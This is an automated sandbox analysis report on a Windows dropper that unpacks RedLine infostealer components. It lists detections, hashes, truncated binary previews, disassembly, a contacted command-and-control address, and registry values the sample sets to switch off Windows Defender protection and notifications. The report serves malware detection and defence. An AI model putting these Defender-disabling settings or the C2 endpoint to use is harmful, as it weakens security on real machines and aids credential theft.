Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_008A7155

Source: C:\Users\user\Desktop\pYHrqNhFKr.exe

Code function: 0_2_008A2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_008A2BFB

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Code function: 3_2_00007FFC9DD1077D GetUserNameA,

3_2_00007FFC9DD1077D

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 5.2.h99af07.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.h99af07.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.h99af07.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pYHrqNhFKr.exe.4c79c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 5.2.h99af07.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.h99af07.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.h99af07.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pYHrqNhFKr.exe.4c79c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.pYHrqNhFKr.exe.4c79c20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Process Injection	22 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	13 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
pYHrqNhFKr.exe	69%	ReversingLabs	Win32.Trojan.Plugx
pYHrqNhFKr.exe	51%	Virustotal		Browse
pYHrqNhFKr.exe	100%	Avira	HEUR/AGEN.1252166
pYHrqNhFKr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	81%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	59%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe	57%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	49%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe	52%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	59%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe	54%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Casdet
C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe	46%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.pYHrqNhFKr.exe.8a0000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
2.3.niba2214.exe.4a0ec20.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File
1.3.niba6073.exe.4577020.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File
0.0.pYHrqNhFKr.exe.8a0000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://api.ip.sb/ip	0%	URL Reputation	safe
193.233.20.28:4125	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
193.233.20.28:4125	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ip.sb/ip	pYHrqNhFKr.exe, 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, l64fQ59.exe.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	829683
Start date and time:	2023-03-18 21:03:42 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	pYHrqNhFKr.exe
Original Sample Name:	65cab4a566b172d984c8f8ebfdbdfea0.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@12/8@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 58.8% (good quality ratio 56.4%) Quality average: 85% Quality standard deviation: 24.1%
HCA Information:	Successful, ratio: 92% Number of executed functions: 116 Number of non-executed functions: 112
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe	58CBL06dSB.exe	Get hash	malicious	Amadey, RedLine	Browse
	fbmtBodVQd.exe	Get hash	malicious	RedLine	Browse
	RCiY2qH78N.exe	Get hash	malicious	RedLine	Browse
	FxqSa2LDwL.exe	Get hash	malicious	RedLine	Browse
	J1u6jhHJBa.exe	Get hash	malicious	Amadey, RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f7051zI.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\h99af07.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe

Download File

Process:	C:\Users\user\Desktop\pYHrqNhFKr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	179200
Entropy (8bit):	4.951964215863173
Encrypted:	false
SSDEEP:	3072:PxqZWN9abUP0Pv3EIye7597h4HxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOuwM:5qZ5v3fV7h
MD5:	6C4C2A56D5DD785ADBE4FE60FA3CC1F2
SHA1:	F8BD4379310258F8E54C47B56F5EEC7394ADB9A2
SHA-256:	B182F2D3D49BDDA2E29A0ED312DEEF4BEE03983DE54080C5E97AD6422DE192D2
SHA-512:	F6958CAB80E2F7736CEA307B51BE546E50ACD5494B72DB0343A09E6EF8C446114F51BE6C9826FCB6E9F7190E4EC8415C0A403C3C1706183577C2604B877FF830
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\l64fQ59.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88% Antivirus: Virustotal, Detection: 81%, Browse
Joe Sandbox View:	Filename: 58CBL06dSB.exe, Detection: malicious, Browse Filename: fbmtBodVQd.exe, Detection: malicious, Browse Filename: RCiY2qH78N.exe, Detection: malicious, Browse Filename: FxqSa2LDwL.exe, Detection: malicious, Browse Filename: J1u6jhHJBa.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............z.... ........@.. ....................... ............@.................................(...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe

Download File

Process:	C:\Users\user\Desktop\pYHrqNhFKr.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	711680
Entropy (8bit):	7.8902015677558275
Encrypted:	false
SSDEEP:	12288:wMrPy90wwLaLRKc8ivC60x+WwOwoFz7/INS6niIOaHaCeDR7pxR:vyLw+wc8g30MW5xANSUiXCY7LR
MD5:	7ED66C765EC9F99A5D8215486D6BC8C9
SHA1:	F328914BCA7292FCBDF8F0E8856DA373E04DCF52
SHA-256:	B92AD2C0F810D458ACA00DAEE24510480D3483D174BA0A2957E2E08AC10000D9
SHA-512:	95B4F7838CDAB00F2FEF1215CA174F2A94B3FB58ED06432E45DF702AFBC771AA0CAB3581B370AD2E7F09D5706E89CBBF390C4738DB2A2BB2D3CF8B2716FEA0D1
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 57%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d...t......`j............@..........................0............@...... .......................................T................... ..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc....`.......V...\|..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\imYkV36.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	400896
Entropy (8bit):	6.799086491924015
Encrypted:	false
SSDEEP:	6144:ipBL6vPRiUryaNB5HC6XkN9UomaZ4RPDNr:ipBGvPIUOaThCpDTQr
MD5:	096E2BA0F9570710D940FC8C2F472610
SHA1:	2ABAA5C867AA6AD1685585F2EEE03F598CB6FCCC
SHA-256:	E6BE267888556464BB6FB416D62BAB0383625C23C1A614D6819E983CCDEA9ECF
SHA-512:	B62EAA662ECBB1F71B95BFF7780F42A50E4DAC78AD8016E0F9EE47AE45D42256068AF903D63DDE45C71ACC6147AADBBB5EA6FD03A788C9D7D57D511699D2C697
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49% Antivirus: Virustotal, Detection: 52%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L.....b......................m......P............@.......................... q.....(...........................................d.....n.......................p.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....p.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	352256
Entropy (8bit):	7.693939457552631
Encrypted:	false
SSDEEP:	6144:Key+bnr+qp0yN90QE31x142x9Q4lJENM0Cr4x+W6QYLwztFz7MwE1w:SMrSy907v4AC60R+WnowZFz7jIw
MD5:	6775BA3EF89ACFDA026F96DF54C2C21D
SHA1:	557EE02A4A5438B9D7ED9BB6BB618B3C682ED9F7
SHA-256:	93F40046EA8851424C4E084BE7A9562EFC4553ECC9336AA7A41693A5A1382301
SHA-512:	25A1767570591807E972F459BF7D238ADC75CBA353FB81DB201A872D0D42693D62902275B389D5151342822F33BB43AA5D8D6C3F48158B038548ACB49D6C36D8
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 54%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................\|....@...... ......................................\...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341504
Entropy (8bit):	6.48186591893242
Encrypted:	false
SSDEEP:	6144:bZ3LYwHUxsB2a9D4lJERA0Cr4x+WBQYLwzAW0nr:bZ38wHU2BsCi0R+Weowar
MD5:	C8B5287FF76DDEC6B7F8C0DA94084603
SHA1:	A184F5E2899BC2EB8B46216866717C042AF714D1
SHA-256:	C3182B01766055A3711BD34FDEB4E6D585F8BB9C7A54BD532CE56DAF2D26219B
SHA-512:	8752AE46628FD8FF925A125AEE47853F4B28E2F1CC149D00C504439EFF0E57B1428B5751CDAC4DF82B82C9A76AB634EA1A302D8A17FC0647F20D3CF7550F1C99
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......P...P...P..(P/..P..9P...P../Pm..P#z.P...P...Py..P..&P...P..8P...P..=P...PRich...P................PE..L......a......................m......P............@..........................0p......C..........................................d.....n.......................o.....................................x-..@............................................text............................... ..`.data...H.j......&..................@....rsrc.........n.....................@..@.reloc..x.....o.....................@..B........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.916514632003815
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pYHrqNhFKr.exe
File size:	856576
MD5:	65cab4a566b172d984c8f8ebfdbdfea0
SHA1:	5628ef015cc37598a43b0f032b1ef91ad7f24934
SHA256:	4700abbc439afe49697e67333bf6d3fcb04b73d73f44b40f68ed20a1e4812a8b
SHA512:	81d853e8a29305edf1c8f1039ad7d2d64ec9d694f45affdff39a9d36c455e88270bdb4bcea85fe0ce9ecd3345f631774ce868c8abf1b77f3dad844db2a561f60
SSDEEP:	24576:ByMW6YJ+DKboT0MWrOJNSAz2CjqVZAe0m:066+64fGOJIAzCVZA
TLSH:	42052253F7D46022E1BA177449F713D30A36BC91AA38436F3386A61E1D72BC9997036B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007F67F116FC45h
jmp 00007F67F116F555h
push 00000058h
push 004072B8h
call 00007F67F116FCE7h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F67F116F56Ah
cmp eax, esi
jne 00007F67F116F559h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F67F116F562h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F67F116F529h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F67F116F55Ch
push 0000001Fh
call 00007F67F116FA7Bh
pop ecx
jmp 00007F67F116F58Ch
cmp dword ptr [004088B0h], ebx
jne 00007F67F116F57Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F67F116F6A6h
pop ecx
pop ecx
test eax, eax
je 00007F67F116F569h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007F67F116F689h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007F67F116F56Dh
push 004010B4h
push 004010ACh
call 00007F67F116FC35h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0xc8b90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd5000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
